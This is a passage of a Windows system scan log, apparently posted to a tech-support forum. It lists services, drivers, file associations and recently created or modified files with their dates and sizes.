S3 Ramdisk;Windows RAM Disk Driver;C:\WINDOWS\System32\drivers\ramdisk.sys [2018-4-11 39840]
S3 ReFS;ReFS;C:\WINDOWS\System32\drivers\refs.sys [2018-8-17 1921944]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2018-8-17 945568]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k rdxgroup [2018-4-11 51288]
S3 rhproxy;Resource Hub proxy driver;C:\WINDOWS\System32\drivers\rhproxy.sys [2018-4-11 104448]
S3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2018-8-16 690832]
S3 SandraAgentSrv;SiSoftware Deployment Agent Service;C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [2018-9-14 136192]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2018-4-11 51288]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2018-8-17 128920]
S3 SDFRd;SDF Reflector;C:\WINDOWS\System32\drivers\SDFRd.sys [2018-4-11 33176]
S3 SEMgrSvc;Payments and NFC/SE Manager;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2018-4-11 1273344]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2018-4-11 154528]
S3 SharedRealitySvc;Spatial Data Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SmbDrv;SmbDrv;C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [2012-8-24 41272]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2012-8-24 43832]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2018-4-11 51288]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 SpatialGraphFilter;Holographic Spatial Graph Filter;C:\WINDOWS\System32\drivers\SpatialGraphFilter.sys [2018-4-11 57752]
S3 spectrum;Windows Perception Service;C:\WINDOWS\System32\Spectrum.exe [2018-8-17 976384]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2018-8-17 105368]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2018-8-17 48544]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2018-4-11 303616]
S3 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2018-4-11 128512]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2018-4-11 152576]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2018-4-11 57856]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2018-4-11 45056]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2018-8-17 29600]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2018-4-11 282008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2018-4-11 98200]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2018-4-11 144288]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2018-4-11 29088]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2018-4-11 67992]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2018-4-11 28064]
S3 VacSvc;Volumetric Audio Compositor Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2018-4-11 35328]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2018-8-17 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2018-4-11 51288]
S3 WaaSMedicSvc;Windows Update Medic Service;C:\WINDOWS\System32\svchost.exe -k wusvcs -p [2018-4-11 51288]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2018-4-11 82944]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2018-8-17 781824]
S3 WdmCompanionFilter;WdmCompanionFilter;C:\WINDOWS\System32\drivers\WdmCompanionFilter.sys [2018-4-11 21408]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2018-4-11 32152]
S3 WinNat;Windows NAT Driver;C:\WINDOWS\System32\drivers\winnat.sys [2018-8-17 227840]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2018-4-11 64920]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2018-4-11 264192]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2018-8-17 295424]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2018-4-11 46592]
S4 hvcrash;hvcrash;C:\WINDOWS\System32\drivers\hvcrash.sys [2018-4-11 33184]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S4 ssh-agent;OpenSSH Authentication Agent;C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2018-4-12 495616]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: opera.exe: open="C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2018-10-09 08:44:41 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{765F7C9F-1CB4-4B4B-A7B4-9A30AEF02AB2}\mpengine.dll
2018-10-09 07:07:14 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2018-10-04 07:15:04 -------- d-----w- C:\Program Files (x86)\Ruiware
2018-10-04 07:15:03 -------- d-----w- C:\ProgramData\InstallMate
2018-09-30 05:31:57 -------- d-----w- C:\WINDOWS\SysWow64\wdegbma
2018-09-29 02:10:59 -------- d-----w- C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 04:42:44 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-28 04:42:24 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-25 06:22:32 -------- d-----w- C:\WINDOWS\Panther
2018-09-22 17:04:38 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 10:13:39 1821184 ----a-w- C:\WINDOWS\System32\IDTNC64.cpl
2018-09-20 10:12:31 542208 ----a-w- C:\WINDOWS\System32\drivers\stwrt64.sys
2018-09-20 10:12:30 499200 ----a-w- C:\WINDOWS\System32\stcplx64.dll
2018-09-20 10:12:29 671744 ------w- C:\WINDOWS\System32\stapi64.dll
2018-09-20 10:12:29 255488 ----a-w- C:\WINDOWS\System32\st646425.dll
2018-09-20 10:12:29 2188800 ----a-w- C:\WINDOWS\System32\stapo64.dll
2018-09-20 10:12:14 -------- d-----w- C:\Program Files\IDT
2018-09-20 08:42:02 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 08:37:15 228032 ----a-w- C:\WINDOWS\System32\drivers\appexDrv.sys
2018-09-20 08:37:14 -------- d-----w- C:\Program Files\AMD Quick Stream
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\AMD AVT
2018-09-20 08:35:42 -------- d-----w- C:\Program Files\ATI Technologies
2018-09-20 08:23:04 -------- d-----w- C:\AMD
2018-09-14 10:29:33 -------- d-----w- C:\T32768
2018-09-14 09:13:17 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 08:39:12 -------- d-----w- C:\ProgramData\Package Cache
2018-09-14 08:38:25 -------- d-----w- C:\Program Files\SiSoftware
2018-09-12 09:46:59 2172928 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
.
==================== Find3M ====================
.
2018-10-06 07:18:38 65536 ----a-w- C:\WINDOWS\System32\spu_storage.bin
2018-09-25 06:33:29 60584 ----a-w- C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys
2018-09-25 06:33:28 46184 ----a-w- C:\WINDOWS\System32\drivers\wd\WdBoot.sys
2018-09-25 06:33:28 352424 ----a-w- C:\WINDOWS\System32\drivers\wd\WdFilter.sys
2018-09-04 23:04:15 835144 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2018-09-04 23:04:15 179808 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2018-08-31 07:46:43 542504 ----a-w- C:\WINDOWS\System32\pcasvc.dll
2018-08-31 07:45:55 348328 ----a-w- C:\WINDOWS\System32\MusNotifyIcon.exe
2018-08-31 07:43:10 1524152 ----a-w- C:\WINDOWS\System32\msctf.dll
2018-08-31 07:42:49 1636232 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2018-08-31 07:27:25 56320 ----a-w- C:\WINDOWS\System32\mf3216.dll
2018-08-31 07:27:10 178176 ----a-w- C:\WINDOWS\System32\t2embed.dll
2018-08-31 07:26:21 101888 ----a-w- C:\WINDOWS\System32\drivers\bowser.sys
2018-08-31 07:25:18 270336 ----a-w- C:\WINDOWS\System32\spp.dll
2018-08-31 07:25:12 266752 ----a-w- C:\WINDOWS\System32\rstrui.exe
2018-08-31 07:24:35 482304 ----a-w- C:\WINDOWS\System32\srcore.dll
2018-08-31 07:24:33 1127936 ----a-w- C:\WINDOWS\System32\nettrace.dll
2018-08-31 07:23:48 1364992 ----a-w- C:\WINDOWS\System32\bcastdvruserservice.dll
2018-08-31 07:23:34 765440 ----a-w- C:\WINDOWS\System32\tdh.dll
2018-08-31 07:22:53 1855488 ----a-w- C:\WINDOWS\System32\msxml3.dll
2018-08-31 07:22:19 1661440 ----a-w- C:\WINDOWS\System32\GdiPlus.dll
2018-08-31 06:55:04 1455960 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2018-08-31 06:53:26 1327504 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2018-08-31 06:41:56 43008 ----a-w- C:\WINDOWS\SysWow64\mf3216.dll
2018-08-31 06:41:34 138752 ----a-w- C:\WINDOWS\SysWow64\t2embed.dll
2018-08-31 06:40:01 216576 ----a-w- C:\WINDOWS\SysWow64\spp.dll
2018-08-31 06:37:50 622080 ----a-w- C:\WINDOWS\SysWow64\tdh.dll
2018-08-31 06:37:13 1585664 ----a-w- C:\WINDOWS\SysWow64\msxml3.dll
2018-08-31 06:36:04 1469952 ----a-w- C:\WINDOWS\SysWow64\GdiPlus.dll
2018-08-31 03:50:07 270648 ----a-w- C:\WINDOWS\System32\SgrmEnclave_secure.dll
2018-08-31 03:50:05 273720 ----a-w- C:\WINDOWS\System32\SgrmEnclave.dll
2018-08-31 03:44:28 1222440 ----a-w- C:\WINDOWS\System32\hvix64.exe
2018-08-31 03:44:27 1030952 ----a-w- C:\WINDOWS\System32\hvax64.exe
2018-08-31 03:44:22 76256 ----a-w- C:\WINDOWS\System32\drivers\hvservice.sys
2018-08-31 03:44:19 1064744 ----a-w- C:\WINDOWS\System32\SecConfig.efi
2018-08-31 03:44:18 568600 ----a-w- C:\WINDOWS\System32\tcblaunch.exe
2018-08-31 03:44:15 136488 ----a-w- C:\WINDOWS\System32\hvloader.dll
2018-08-31 03:43:40 722880 ----a-w- C:\WINDOWS\System32\ci.dll
2018-08-31 03:43:19 2719216 ----a-w- C:\WINDOWS\System32\drivers\tcpip.sys
2018-08-31 03:28:56 1989496 ----a-w- C:\WINDOWS\SysWow64\msxml6.dll
2018-08-31 03:28:50 1514352 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2018-08-31 03:28:44 6043680 ----a-w- C:\WINDOWS\SysWow64\windows.storage.dll
2018-08-31 03:28:42 134936 ----a-w- C:\WINDOWS\SysWow64\gdi32.dll
2018-08-31 03:28:38 6570040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2018-08-31 03:28:37 453104 ----a-w- C:\WINDOWS\SysWow64\dpx.dll
2018-08-31 03:28:24 1129728 ----a-w- C:\WINDOWS\SysWow64\msvproc.dll
2018-08-31 03:28:20 568568 ----a-w- C:\WINDOWS\SysWow64\CoreMessaging.dll
2018-08-31 03:26:44 25847808 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2018-08-31 03:21:14 22008320 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2018-08-31 03:18:30 8189440 ----a-w- C:\WINDOWS\System32\Windows.Data.Pdf.dll
2018-08-31 03:17:08 144384 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2018-08-31 03:17:01 20480 ----a-w- C:\WINDOWS\System32\netevent.dll
2018-08-31 03:16:47 6661120 ----a-w- C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2018-08-31 03:16:03 4382720 ----a-w- C:\WINDOWS\System32\EdgeContent.dll
2018-08-31 03:15:44 4866560 ----a-w- C:\WINDOWS\System32\jscript9.dll
2018-08-31 03:15:40 3392512 ----a-w- C:\WINDOWS\System32\tquery.dll
2018-08-31 03:15:13 7577088 ----a-w- C:\WINDOWS\System32\Chakra.dll
2018-08-31 03:15:07 894464 ----a-w- C:\WINDOWS\System32\webplatstorageserver.dll
2018-08-31 03:15:03 395776 ----a-w- C:\WINDOWS\System32\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:15:02 75776 ----a-w- C:\WINDOWS\System32\drivers\mpsdrv.sys
2018-08-31 03:14:53 2700288 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2018-08-31 03:14:50 154112 ----a-w- C:\WINDOWS\System32\Chakradiag.dll
2018-08-31 03:14:42 898560 ----a-w- C:\WINDOWS\System32\WpcWebFilter.dll
2018-08-31 03:14:31 808448 ----a-w- C:\WINDOWS\System32\EdgeManager.dll
2018-08-31 03:14:26 726528 ----a-w- C:\WINDOWS\System32\jscript9diag.dll
2018-08-31 03:13:19 402432 ----a-w- C:\WINDOWS\System32\drivers\ks.sys
2018-08-31 03:13:07 2738688 ----a-w- C:\WINDOWS\System32\mssrch.dll
2018-08-31 03:13:01 1708544 ----a-w- C:\WINDOWS\System32\MSPhotography.dll
2018-08-31 03:12:51 736256 ----a-w- C:\WINDOWS\System32\drivers\srv2.sys
2018-08-31 03:12:36 20480 ----a-w- C:\WINDOWS\SysWow64\netevent.dll
2018-08-31 03:11:38 796672 ----a-w- C:\WINDOWS\System32\mssvp.dll
2018-08-31 03:11:29 2236928 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2018-08-31 03:11:19 1854976 ----a-w- C:\WINDOWS\System32\wevtsvc.dll
2018-08-31 03:11:18 1057792 ----a-w- C:\WINDOWS\System32\SearchIndexer.exe
2018-08-31 03:11:11 604160 ----a-w- C:\WINDOWS\System32\updatehandlers.dll
2018-08-31 03:11:07 406528 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2018-08-31 03:10:55 608768 ----a-w- C:\WINDOWS\SysWow64\EdgeManager.dll
2018-08-31 03:10:55 1375744 ----a-w- C:\WINDOWS\System32\usocore.dll
2018-08-31 03:10:49 3711488 ----a-w- C:\WINDOWS\SysWow64\jscript9.dll
2018-08-31 03:10:45 5777920 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2018-08-31 03:10:42 889344 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2018-08-31 03:10:40 288768 ----a-w- C:\WINDOWS\SysWow64\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:10:28 1361408 ----a-w- C:\WINDOWS\SysWow64\MSPhotography.dll
2018-08-31 03:10:27 561152 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2018-08-31 03:10:26 176640 ----a-w- C:\WINDOWS\System32\mssph.dll
2018-08-31 03:09:58 578560 ----a-w- C:\WINDOWS\SysWow64\webplatstorageserver.dll
2018-08-31 03:09:23 2258944 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2018-08-31 03:08:28 619520 ----a-w- C:\WINDOWS\SysWow64\WpcWebFilter.dll
2018-08-31 03:07:32 856064 ----a-w- C:\WINDOWS\SysWow64\SearchIndexer.exe
2018-08-31 03:07:14 735744 ----a-w- C:\WINDOWS\SysWow64\mssvp.dll
2018-08-31 03:06:57 345088 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2018-08-30 04:44:37 152688 ----a-w- C:\WINDOWS\System32\drivers\mbae64.sys
2018-08-28 09:27:28 1952768 ----a-w- C:\WINDOWS\NDE2ZDRjZ.exe
2018-08-28 07:17:55 23862784 ----a-w- C:\WINDOWS\System32\Hydrogen.dll
2018-08-28 06:56:08 1008640 ----a-w- C:\WINDOWS\System32\Windows.Media.MixedRealityCapture.dll
2018-08-28 06:49:46 677376 ----a-w- C:\WINDOWS\System32\HeadTrackerStorage.dll
2018-08-28 06:48:22 1274368 ----a-w- C:\WINDOWS\System32\HoloSI.PCShell.dll
2018-08-28 06:45:57 713216 ----a-w- C:\WINDOWS\System32\SharedRealitySvc.dll
2018-08-28 05:51:14 868864 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.MixedRealityCapture.dll
2018-08-18 00:47:08 563832 ------w- C:\WINDOWS\System32\MpSigStub.exe
.
============= FINISH: 20:06:10.54 ===============

Attached Files
File Type: txt attach.txt (11.1 KB)
